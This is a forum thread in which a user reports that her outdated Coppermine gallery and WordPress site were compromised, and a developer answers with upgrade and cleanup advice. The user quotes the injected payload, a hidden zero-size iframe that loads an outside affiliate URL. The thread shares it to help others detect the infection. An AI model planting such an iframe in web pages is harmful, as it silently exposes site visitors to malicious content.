Print

[Veronica210]

My site was hacked yesterday and easily fixed thanks to the kind help found on these forums - particular thanks to Nibbler.  Most people, and given my site is a low volume traffic/personal site, will never notice they are infected - so my guess is that this bot has infected thousands of other people. There is only one mention of this on these forums but I could not read it (can't read German).

The hack broke Coppermine and WordPress. The hack affected most of the files in the include folder. It inserted the following code in the php files. It also added 3 index files in some of the albums subfolders. These files don't do much, contain the same code, and they can't be deleted - will need my host to delete these.

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Symptoms:
1) Coppermine would not display at all. Error page showed problem with debugger.inc.php - fix was simply to replace this file. The real smoking gun was in WordPress - the formatting of the pages were broken in IE but not in FF.

2) As Coppermine pages (or WordPress) load you will see transfers from strange sites in the status bar.

3) Viewing the page source in Coppermine is obvious (right at the top) - in WP you need to do a search.

Solution:
Without upgrading, search and replace the code with nothing and ftp back. This is a short term solution obviously. The next step is to upgrade to 1.4.12 or the most current version. The upgrade/update went well although the documentation could remind you to also change the table prefix. In my case this wasn't clear because I had a mix of old and new Coppermine tables in my database - some were 1.3 others were 1.4

Hope that helps.

[Veronica210]

I should have added that my site does not allow user login nor comments - i.e. this was really not expected.

[Joachim Müller]

What is the use of your posting? The vulnerabilities of cpg1.4.9 are well known. Running outdated versions is asking for punishment. I appreciate your readiness to share something with the community that helped you. However, I'm not sure why you need to post the obvious: perform all mandatory upgrades and you should be fine. If you don't, it is likely that someone will exploit the known security vulnerabilities of outdated versions and get your site hacked sooner or later. Did I miss something? Marking thread as "invalid".

[Tranz]

The upgrade/update went well although the documentation could remind you to also change the table prefix. In my case this wasn't clear because I had a mix of old and new Coppermine tables in my database - some were 1.3 others were 1.4

The documentation doesn't remind you to change the table prefix because you're not supposed to change the prefix during upgrades. Were you manually editing the table prefixes? The prefix just helps to differentiate different installations but it doesn't affect the functionality of the gallery once installation has been completed. The prefix could be foobar for that matter.

[Veronica210]

What is the use of your posting? The vulnerabilities of cpg1.4.9 are well known. Running outdated versions is asking for punishment. I appreciate your readiness to share something with the community that helped you. However, I'm not sure why you need to post the obvious: perform all mandatory upgrades and you should be fine. If you don't, it is likely that someone will exploit the known security vulnerabilities of outdated versions and get your site hacked sooner or later. Did I miss something? Marking thread as "invalid".

thanks - you confirmed something for me - that people like yourself don't want bad press - they don't want users to know that their php application contains security holes.

why not update immediately? there's a good reason for that as well - it's called customization, after you have spent hours tweaking your themes and pages who knows if they will work afterwards - in my case they did - i updated both Coppermine and Wordpress without any problems.

Finally, I think it is much more important to try to understand where the point of entry was - the open door that let the hacker in - than to hide one's head in the sand like an ostrich. this reminds me of the average tech support that thinks every pc problem is caused by a virus and that reformatting and reinstalling the os is the proper solution.

[Veronica210]

The documentation doesn't remind you to change the table prefix because you're not supposed to change the prefix during upgrades. Were you manually editing the table prefixes? The prefix just helps to differentiate different installations but it doesn't affect the functionality of the gallery once installation has been completed. The prefix could be foobar for that matter.

no, i had not touched the tables - no idea what happened, i may have installed and uninstalled years ago. i did go and manually delete the old tables after i updated, so hopefully no issues with the next update.

[Veronica210]

What is the use of your posting?

p.s. i was so disappointed with your post that I forgot to answer it.
What is the use of the posting? Because this hack does not shut down the site nor is it evident, i expect many people are infected. it never hurts to check your source code. the next attack could be much more damaging.

[Joachim Müller]

Your posting doesn't help others who actually have fallen victim of malevolent attacks, it just states the obvious: that you have failed to upgrade as soon as the vulnerability has been detected and the fix has been released.
I can't see the point in posting about a vulnerability in an old version of coppermine: it's a known issue that we have informed users about long ago.

The only thing we can provide help with is how to secure your coppermine gallery against known vulnerabilities. We can not help you with cleaning up your gallery if the attack has already happened. After all, once your gallery has been hacked, there can be a myriad of things that the attacker could have done. Usually, the attackers leave a backdoor behind so they can re-enter your coppermine install with admin privileges even after you have upgraded. So once you have been attacked, there are two things you have to do: first, upgrade coppermine. Second: scan your entire webserver for potential backdoors. This second task can be time-consuming and hard to perform for newbies who don't know potential attacking schemes - after all you have to be a hacker to know what evil hackers can do. Most coppermine users are not hackers, nor do they know their way around good enough in closing backdoors and figuring out what the attacker actually did.
Bottom line: best practise is to keep your gallery up-to-date, make frequent backups both of your files as well as the database. This should keep attackers away. If you have still fallen victim to an attack, seek professional help.

[Veronica210]

Your posting doesn't help others who actually have fallen victim of malevolent attacks, it just states the obvious: that you have failed to upgrade as soon as the vulnerability has been detected and the fix has been released.
I can't see the point in posting about a vulnerability in an old version of coppermine: it's a known issue that we have informed users about long ago.

The point, once more *Sigh* is to try to understand the point of entry - I was hoping someone who knew could shed light but obviously only a hacker would.

After all, once your gallery has been hacked, there can be a myriad of things that the attacker could have done. Usually, the attackers leave a backdoor behind so they can re-enter your coppermine install with admin privileges even after you have upgraded.

Hmmm let me see. I thought it was a bot - but you're saying someone actually took the time to install a keylogger on my PC and rather than transfer funds from my bank account to his, rather than delete all my files, rather than mastermind a terrible DOS attack on Microsoft, all they did was stick an iframe (repeatedly) in some files?? What a stupid hacker!
[/quote]

So once you have been attacked, there are two things you have to do: first, upgrade coppermine. Second: scan your entire webserver for potential backdoors. This second task can be time-consuming and hard to perform for newbies who don't know potential attacking schemes

You're right, I don't know the potential attacking scheme because I'm such a noob...but you must know since you are a guru...but you won't share will you?

[Joachim Müller]

The point, once more *Sigh* is to try to understand the point of entry - I was hoping someone who knew could shed light but obviously only a hacker would.
[...]
You're right, I don't know the potential attacking scheme because I'm such a noob...but you must know since you are a guru...but you won't share will you?

There is no easy step-by-step instructions. I'd need full access to the site (FTP access, a coppermine admin account) and maybe two or three hours of work (depending on the size of your site and the connection speed) to fully clean your site, which is beyond of what you can expect from unpaid support.
Additionally, I have little sympathy for people who fail to upgrade and then come whining "help me clean up the mess the hacker accomplished". If someone helped them to clean up they would not learn anything. If you have to clean up yourself, the process will be much more painfull. As a result, your readiness to keep your apps up-to-date will increase.

To give you a general idea what you'd need to do:

• Make a full backup of all files and folders on your webspace
• Replace all possibly infected files with fresh ones that are guaranteed to be clean (from a fresh package)
• Scan the files and folders you downloaded for executable files: PHP, Perl files, bash scripts, whatever the user could have left (depending on the skills of the attacker) and delete all of them on your webspace (the tricky part being that you need to really find all backdoors)
• Browse the database, coppermine's user table. Search for admin accounts. Delete all that you don't know. Change the password of your own admin account
• Change all seurity-sensitive passwords (for FTP access, website control panel, mySQL) and reflect your changes in the apps you use (changed mySQL account!)
• Tell your webhost about the attack. Ask them to see the server logs for the period where the attack has happened

Hmmm let me see. I thought it was a bot - but you're saying someone actually took the time to install a keylogger on my PC and rather than transfer funds from my bank account to his, rather than delete all my files, rather than mastermind a terrible DOS attack on Microsoft, all they did was stick an iframe (repeatedly) in some files?? What a stupid hacker!

Maybe a stupid hacker (a script kid). But maybe he just disguised the real attack with some silly defacement. Who knows?

[Veronica210]

Additionally, I have little sympathy for people who fail to upgrade and then come whining "help me clean up the mess the hacker accomplished". If someone helped them to clean up they would not learn anything. If you have to clean up yourself, the process will be much more painfull. As a result, your readiness to keep your apps up-to-date will increase.

What mess? What are you talking about? Not only is the MySQL database on my site backed-up weekly (at least the blog part) but every single file is backed-up as well. I run a mirror (WAMP) locally, I have DVDs offsite, I have Maxtor external storage, and I have a 250GB network storage drive - to be upgraded soon.

As for content, 90% of my content are my photographs - all of which are archived and none of which are displayed at high resolution - i.e. good luck damaging my website. In the same way, my PCs are all ghosted (Norton Ghost) so that I can restore them to "new" in under 3 minutes - my OS and Apps are on different partitions and my Data is always stored on different drives (or partitions). In other words, nobody practices backup more religiously than i do!


As for PC and Network Protection? Hardware and software firewalls (no wireless on my watch), anti-virus, and anti-spyware (and rootkit scanning at least twice a year). Risk of attack? Almost 0 given I don't surf porn or warez site - and I only use email from work. My server? That's another story. It is shared and my hosts were not helpful in the least - they claim that the server was not hacked, nor was my FTP account - that it was just a php vulnerability - lots of helpful bullshit from them, but it does make sense.

Finally, who the hell complained about cleaning up the mess or asking for help?

Do you think I need your help in learning how to backup my files or finding infected files? First I copied the entire site to my hard drive - then I scanned for "infected" code snippets using batch search and replace utilities. Fact: this attack left a signature - it has compromised mambo, coppermine, wordpress, and phpbb implementations on other websites (that's what i saw with google) but again, most ppl will not even know they are infected - the iframe is invisible to them.

I also deleted every single file in my coppermine and wordpress folders - then I upgraded.

End of story - my site was back up and running very quickly and has not been compromised since. No mess, no whining...lessons learned? yep, to upgrade is critical even for a site like mine which is not even in the top 50 million sites.

Ok, so you win this argument - I still don't have a clue how the BOT got in (forget about FTP hacks - the server logs I have access to in my Plesk Control Panel would have revealed Kevin Mitnick's attack). I don't think you know either - I don't think anyone except the bot kiddies know. So the real lesson learned - I"ll have to wait for a security expert to explain that one to me, but I'm not sure such an animal exists.

All that to say, thanks anyway, and on a more positive note - thank you for Coppermine it is an excellent application - you've done a great job and, yes, i will upgrade the sucker regularly even if it means lots of work redoing the customizations.

Please consider this thread closed, at least from my end.